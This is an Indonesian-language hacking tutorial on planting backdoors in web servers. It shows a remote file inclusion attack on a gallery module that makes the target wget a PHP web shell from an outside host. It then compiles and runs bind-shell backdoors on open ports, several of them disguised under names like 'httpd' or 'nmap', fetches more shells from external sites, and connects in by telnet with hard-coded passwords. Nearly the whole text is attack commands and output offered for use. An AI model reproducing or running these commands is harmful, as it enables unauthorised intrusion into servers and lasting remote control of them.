Pasang Bancdoor

=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/log.php

==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind  /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com                                                                
PING target.com (210.189.77.28): 56 data bytes                                                 
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms                                 
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---                                                              
2 packets transmitted, 2 packets received, 0.0% packet loss                                    
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28                                                    
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000                                                           
Trying 210.189.77.28...                                                                       
Connected to target.com (210.189.77.28).                                                      
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell

### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029